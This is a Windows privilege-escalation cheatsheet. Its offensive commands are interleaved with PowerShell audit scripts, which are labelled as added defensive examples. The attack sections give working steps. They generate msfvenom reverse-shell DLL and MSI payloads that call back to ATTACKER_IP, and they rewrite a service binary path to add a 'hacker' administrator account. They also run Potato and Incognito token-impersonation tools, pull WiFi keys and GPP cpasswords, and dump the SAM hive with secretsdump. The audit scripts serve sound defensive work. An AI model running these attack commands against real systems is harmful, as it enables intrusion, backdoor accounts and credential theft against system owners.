Quick Reference
Intermediate

Windows PrivEsc Cheatsheet

Essential commands for escalating privileges on Windows systems.

Quick Reference

Replace TARGET, USER, PASS with your actual values. Commands assume you have initial access.

System Enumeration

enum-system.cmd

```cmd
# System info
systeminfo
hostname
whoami /all
whoami /priv

# OS version and patches
wmic os get Caption,Version,BuildNumber
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Network info
ipconfig /all
route print
netstat -ano
arp -a

# Users and groups
net user
net localgroup
net localgroup Administrators
query user
```

Automated Tools

WinPEAS

winpeas.cmd

```cmd
# Download and run
curl -o winpeas.exe https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
winpeas.exe

# Specific checks
winpeas.exe quiet servicesinfo
winpeas.exe quiet applicationsinfo
winpeas.exe quiet userinfo

# Output to file
winpeas.exe log=output.txt
```

PowerUp

powerup.ps1

```powershell
# Import PowerUp (either form works; dot-sourcing is the usual one)
. .\PowerUp.ps1
Import-Module .\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Specific checks
Get-ServiceUnquoted
Get-ModifiableServiceFile
Get-ModifiableService
Find-ProcessDLLHijack
```

Service Exploits

Unquoted Service Path

unquoted-path.cmd

```cmd
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """

# PowerShell equivalent
Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'}

# If path is: C:\Program Files\Vuln App\service.exe
# Write malicious exe to:
# C:\Program.exe or C:\Program Files\Vuln.exe

# Restart service
sc stop VulnService
sc start VulnService
```

Weak Service Permissions

weak-service.cmd

```cmd
# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# Modify service binary path
sc config VulnService binpath= "C:\temp\shell.exe"
sc config VulnService binpath= "net user hacker P@ssw0rd /add && net localgroup Administrators hacker /add"

# Restart service
net stop VulnService
net start VulnService

# Check service permissions in registry (PowerShell)
Get-Acl -Path HKLM:\System\CurrentControlSet\Services\VulnService | Format-List
```
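The two service weaknesses above, unquoted paths and weak service DACLs, are just as easy to audit from the defending side. The script below is an added defensive example and is not part of the original cheatsheet: it lists services whose executable path contains a space but no quotes, can quote the ImagePath in the registry as a remediation (previewed with -WhatIf), and parses each service's SDDL (the same string `sc sdshow` prints) to report allow-ACEs that hand configuration rights to Everyone, Users, Authenticated Users or INTERACTIVE. It assumes an elevated PowerShell 5.1+ session on the host being audited; the function names are my own.

```powershell
# Added defensive example, not part of the original cheatsheet. Assumes an elevated
# PowerShell 5.1+ session; function names are assumptions, not from any tool.

# Well-known SIDs that should never hold configuration rights on a service.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# Service access rights that let a caller change what the service runs:
# SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL.
$DangerousMask = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Get-UnquotedServicePath {
    # Services whose executable path contains a space but is not wrapped in quotes.
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and
        (($_.PathName -split ' -| /')[0] -match ' ')   # inspect the executable, not its arguments
    } | Select-Object Name, StartName, PathName
}

function Repair-UnquotedServicePath {
    # Remediation: wrap the executable part of ImagePath in quotes. Supports -WhatIf.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $path = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if ($path -match '^"') { return }
    if ($path -match '^(?<exe>.+?\.exe)(?<args>.*)$') {   # split after the first .exe so args stay outside
        $fixed = '"' + $Matches.exe + '"' + $Matches.args
        $kind  = (Get-Item -Path $key).GetValueKind('ImagePath')   # keep REG_EXPAND_SZ values as such
        if ($PSCmdlet.ShouldProcess($Name, "set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type $kind
        }
    }
}

function Get-WeakServiceDacl {
    # Parses each service's SDDL and reports allow-ACEs that give a low-privileged
    # principal any of the dangerous rights above.
    foreach ($svc in Get-Service) {
        $sddl = (& sc.exe sdshow $svc.Name | Where-Object { $_ -match '^\s*D:' }) -join ''
        if (-not $sddl) { continue }    # access denied on protected services: nothing to parse
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl.Trim())
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce] -or $ace.AceType -ne 'AccessAllowed') { continue }
            $sid = $ace.SecurityIdentifier.Value
            if ($LowPrivSids.ContainsKey($sid) -and ($ace.AccessMask -band $DangerousMask)) {
                [pscustomobject]@{
                    Service    = $svc.Name
                    Principal  = $LowPrivSids[$sid]
                    AccessMask = '0x{0:X}' -f $ace.AccessMask
                }
            }
        }
    }
}

# Audit first; the repair is previewed with -WhatIf and applied by dropping it.
Get-UnquotedServicePath | Format-Table -AutoSize
Get-WeakServiceDacl     | Format-Table -AutoSize
Get-UnquotedServicePath | ForEach-Object { Repair-UnquotedServicePath -Name $_.Name -WhatIf }
```

A weak DACL finding should be fixed at the service (`sc sdset` with a corrected SDDL or the vendor's installer), not by quoting; a DACL that grants SERVICE_CHANGE_CONFIG to Users lets the binary path be rewritten regardless of quoting.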

DLL Hijacking

dll-hijack.cmd

```cmd
# Find missing DLLs (run as admin to monitor all services)
# Use Process Monitor - filter: Result = NAME NOT FOUND, Path ends with .dll

# DLL search order (with SafeDllSearchMode enabled, the default):
# 1. Directory of executable
# 2. C:\Windows\System32
# 3. C:\Windows\System
# 4. C:\Windows
# 5. Current directory
# 6. Directories in PATH

# Check which of those directories are writable
icacls "C:\Program Files\VulnApp"
icacls "C:\Program Files (x86)\VulnApp"

# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f dll -o hijack.dll
```

Registry Exploits

registry.cmd

```cmd
# AlwaysInstallElevated (both values must be 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If enabled, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o shell.msi

# Install MSI as SYSTEM
msiexec /quiet /qn /i shell.msi

# AutoRun - Check for writable autoruns
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# Check write permissions on autorun binaries
accesschk.exe -wvu "C:\Path\To\AutorunApp.exe"
```
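Because AlwaysInstallElevated only matters when both hives carry the value, a check that reads one key in isolation produces false alarms. The script below is an added defensive example, not part of the original cheatsheet: it reads both hives (a missing value counts as 0), gives a single verdict, and turns the setting off on request, with -WhatIf support. It assumes an elevated session; the function names are my own.

```powershell
# Added defensive example, not part of the original cheatsheet. Assumes an elevated
# PowerShell session; function names are assumptions.
$InstallerPolicyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One row per hive plus an overall verdict: the weakness exists only when BOTH
    # values are 1. A missing key or value is treated as 0 (policy not configured).
    $rows = foreach ($key in $InstallerPolicyKeys) {
        $value = 0
        if (Test-Path $key) {
            $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
            if ($null -eq $value) { $value = 0 }
        }
        [pscustomobject]@{ Hive = $key.Split(':')[0]; AlwaysInstallElevated = [int]$value }
    }
    [pscustomobject]@{
        Hives      = $rows
        Vulnerable = (@($rows | Where-Object { $_.AlwaysInstallElevated -ne 1 }).Count -eq 0)
    }
}

function Disable-AlwaysInstallElevated {
    # Remediation: set the value to 0 wherever the key exists. On a domain member the
    # value is normally delivered by GPO, so fix the GPO too or the next refresh reverts it.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($key in $InstallerPolicyKeys) {
        if (-not (Test-Path $key)) { continue }
        if ($PSCmdlet.ShouldProcess($key, 'set AlwaysInstallElevated = 0')) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$state = Get-AlwaysInstallElevatedState
$state.Hives | Format-Table -AutoSize
if ($state.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is 1 in both hives: any user can install an MSI as SYSTEM.'
    Disable-AlwaysInstallElevated -WhatIf   # drop -WhatIf to apply
}
```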

Scheduled Tasks

scheduled-tasks.cmd

```cmd
# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE

# Get task details
schtasks /query /tn "TaskName" /fo LIST /v

# Find tasks running as SYSTEM
# (LIST output puts TaskName and "Run As User" on separate lines, so chained findstr
# calls never match; CSV keeps each task on one line and can be filtered directly)
schtasks /query /fo CSV /v | findstr /i "SYSTEM"

# PowerShell equivalent
Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq 'SYSTEM' } | Select-Object TaskPath, TaskName

# Check permissions on task binaries
icacls "C:\Path\To\Task\Binary.exe"
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"

# If writable, replace with payload
copy C:\temp\shell.exe "C:\Path\To\Task\Binary.exe" /y
```
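The autorun checks in the Registry section and the task-binary checks above come down to the same question: does a privileged autostart point at a file (or a parent directory) that a low-privileged user can write? The script below is an added defensive example, not part of the original cheatsheet, and serves both sections: it walks the machine-wide Run/RunOnce keys and every enabled scheduled task that runs as SYSTEM or with highest privileges, extracts the executable from each command line, and reports those where Everyone, Users, Authenticated Users or INTERACTIVE hold write-class rights on the file or its directory. It assumes an elevated PowerShell 5.1+ session with the ScheduledTasks module (Windows 8 / Server 2012 and later); the function names are my own.

```powershell
# Added defensive example, not part of the original cheatsheet. Assumes an elevated
# PowerShell 5.1+ session with the ScheduledTasks module; function names are assumptions.

$LowPrivNames = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteRights  = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, TakeOwnership, ChangePermissions'
$SystemIds    = @('SYSTEM', 'LocalSystem', 'NT AUTHORITY\SYSTEM', 'S-1-5-18')

function Get-ExecutableFromCommand {
    # Pulls the executable out of a command line: the quoted token if quoted,
    # otherwise everything up to and including the first '.exe'. Expands %VARS%.
    param([string]$CommandLine)
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl -match '^"(?<exe>[^"]+)"') { return $Matches.exe }
    if ($cl -match '^(?<exe>.+?\.exe)') { return $Matches.exe }
    return ($cl -split ' ')[0]
}

function Test-LowPrivWritable {
    # True if a low-privileged identity holds write-class rights on the file itself
    # or on its parent directory (a writable directory lets the file be replaced).
    param([string]$Path)
    foreach ($target in @($Path, (Split-Path -Parent $Path))) {
        if (-not $target -or -not (Test-Path -LiteralPath $target)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $target).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivNames -notcontains $ace.IdentityReference.Value) { continue }
            $rights = [int]$ace.FileSystemRights
            # Also catch GENERIC_WRITE / GENERIC_ALL bits, which Get-Acl shows as raw numbers.
            if (($rights -band [int]$WriteRights) -or ($rights -band 0x40000000) -or ($rights -band 0x10000000)) { return $true }
        }
    }
    return $false
}

function Get-WritableAutostart {
    # Machine-wide Run/RunOnce keys: these execute in every user's session.
    $runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }) {
            $exe = Get-ExecutableFromCommand $p.Value
            if (Test-LowPrivWritable $exe) {
                [pscustomobject]@{ Source = "Run key: $($p.Name)"; RunsAs = 'each logged-on user'; Binary = $exe }
            }
        }
    }
    # Enabled scheduled tasks that run as SYSTEM or with highest privileges.
    foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
        $principal = $task.Principal
        if ($SystemIds -notcontains $principal.UserId -and $principal.RunLevel -ne 'Highest') { continue }
        foreach ($action in $task.Actions | Where-Object { $_.Execute }) {
            $exe = Get-ExecutableFromCommand $action.Execute
            if (Test-LowPrivWritable $exe) {
                [pscustomobject]@{ Source = "Task: $($task.TaskPath)$($task.TaskName)"; RunsAs = $principal.UserId; Binary = $exe }
            }
        }
    }
}

Get-WritableAutostart | Format-Table -AutoSize
```

Each finding is fixed by tightening the ACL on the binary and its directory (or moving the binary under a protected path such as Program Files), not by changing the task; the task is only the trigger.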

Token Impersonation

Potato Attacks

potato.cmd

```cmd
# Check if SeImpersonatePrivilege is enabled
whoami /priv

# JuicyPotato (Windows 7-10, Server 2008-2016)
JuicyPotato.exe -l 1337 -p c:\temp\shell.exe -t *

# PrintSpoofer (Windows 10, Server 2016-2019)
PrintSpoofer.exe -i -c "cmd /c c:\temp\shell.exe"

# GodPotato (Universal)
GodPotato.exe -cmd "cmd /c c:\temp\shell.exe"

# SweetPotato
SweetPotato.exe -e EfsRpc -p c:\temp\shell.exe
```

Incognito

incognito.sh

```bash
# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
impersonate_token "DOMAIN\Administrator"

# Standalone incognito.exe
incognito.exe list_tokens -u
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

# Check for available tokens
whoami /priv | findstr SeImpersonate
whoami /priv | findstr SeAssignPrimaryToken
```

Credential Harvesting

credentials.cmd

```cmd
# Saved credentials
cmdkey /list
runas /savecred /user:DOMAIN\admin cmd

# Unattend files
dir /s *unattend.xml 2>nul
dir /s *sysprep.xml 2>nul
dir /s *sysprep.inf 2>nul

# Common locations
type C:\unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml

# Group Policy Preferences (cpassword)
dir /s Groups.xml 2>nul
findstr /si cpassword *.xml

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

# SAM/SYSTEM (if readable)
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL
```
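The unattend and GPP findings above are leftovers that a build process should have cleaned up, so the defensive version of this check is a sweep that locates them without echoing the secret. The script below is an added example, not part of the original cheatsheet: it visits the answer-file locations listed above, parses each XML answer file for `Password` / `AdministratorPassword` elements that still carry a value (sysprep is supposed to blank them on completion), checks the legacy INI-style sysprep.inf for `AdminPassword=`, and flags Group Policy Preference XML files containing `cpassword`. It reports file and setting only, never the value. It assumes an elevated session; the search roots are assumptions drawn from the paths above and the function names are my own.

```powershell
# Added defensive example, not part of the original cheatsheet. Assumes an elevated
# PowerShell session; roots and function names are assumptions.

$KnownAnswerFiles = @(
    "$env:SystemDrive\unattend.xml",
    "$env:windir\Panther\Unattend.xml",
    "$env:windir\Panther\Unattend\Unattend.xml",
    "$env:windir\System32\sysprep.inf",
    "$env:windir\System32\sysprep\sysprep.xml"
)
$AnswerFileDirs = @("$env:windir\Panther", "$env:windir\System32\sysprep")
# SYSVOL exists on domain controllers; the History folder is the local GPO cache on members.
$GppRoots = @("$env:windir\SYSVOL", "$env:ALLUSERSPROFILE\Microsoft\Group Policy\History")

function Get-AnswerFilePassword {
    # One row per password value that survived in an answer file.
    param([string]$Path)
    if ($Path -like '*.inf') {
        # Legacy sysprep.inf is INI-style: AdminPassword=... under [GuiUnattended].
        $hit = Select-String -LiteralPath $Path -Pattern '^\s*AdminPassword\s*=\s*\S' -Quiet
        if ($hit) { [pscustomobject]@{ File = $Path; Setting = 'AdminPassword'; PlainText = 'yes' } }
        return
    }
    try { [xml]$doc = Get-Content -LiteralPath $Path -Raw -ErrorAction Stop } catch { return }
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace.
    foreach ($pw in $doc.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")) {
        $valueNode = $pw.SelectSingleNode("*[local-name()='Value']")
        $value = if ($valueNode) { $valueNode.InnerText } else { $pw.InnerText }
        if ([string]::IsNullOrWhiteSpace($value)) { continue }
        $plainNode = $pw.SelectSingleNode("*[local-name()='PlainText']")
        # A base64 Value with PlainText=false is only encoded, not encrypted.
        $plain = if ($plainNode) { $plainNode.InnerText } else { 'unspecified (base64 only)' }
        [pscustomobject]@{ File = $Path; Setting = $pw.ParentNode.Name; PlainText = $plain }
    }
}

function Get-CredentialResidue {
    $files = @($KnownAnswerFiles | Where-Object { Test-Path -LiteralPath $_ })
    foreach ($dir in $AnswerFileDirs) {
        if (Test-Path -LiteralPath $dir) {
            $files += Get-ChildItem -Path $dir -Recurse -File -Include '*unattend*.xml', 'sysprep.xml', 'sysprep.inf' -ErrorAction SilentlyContinue |
                      Select-Object -ExpandProperty FullName
        }
    }
    foreach ($f in ($files | Sort-Object -Unique)) { Get-AnswerFilePassword -Path $f }

    foreach ($root in $GppRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -Path $root -Recurse -File -Filter '*.xml' -ErrorAction SilentlyContinue |
            Select-String -Pattern 'cpassword="[^"]+"' -List |
            ForEach-Object { [pscustomobject]@{ File = $_.Path; Setting = 'GPP cpassword'; PlainText = 'AES key is public; treat as plaintext' } }
    }
}

Get-CredentialResidue | Format-Table -AutoSize
```

Any row in the output is a file to delete (or an answer-file section to blank) and a credential to rotate, since the account it belongs to must be assumed exposed.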

Kernel Exploits

kernel.cmd

```cmd
# Check Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,Version,BuildNumber

# Get hotfixes
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt

# Common exploits by version
# Windows 7/2008 R2: MS16-032, MS15-051, MS14-058
# Windows 8/2012: MS16-032, MS15-051
# Windows 10/2016: Various potato exploits

# MS16-032 Secondary Logon Handle (PowerShell: dot-source the script, then call the function)
. .\Invoke-MS16032.ps1
Invoke-MS16032

# Check Exploit-DB and searchsploit
searchsploit windows kernel privilege escalation
```

Quick Reference

| Technique | Check Command | Required Privilege |
|---|---|---|
| Unquoted Path | `wmic service get pathname` | Write to path directory |
| Weak Service | `accesschk.exe -uwcqv Users *` | Modify service config |
| AlwaysInstallElevated | `reg query HKLM\...\Installer` | Any user |
| Token Impersonation | `whoami /priv` | SeImpersonate |
| Saved Creds | `cmdkey /list` | Any user |
| Kernel Exploit | `systeminfo` | Varies |

⚠️ Legal Disclaimer

Privilege escalation techniques are for authorized testing only. Always have written permission before attempting to escalate privileges on any system.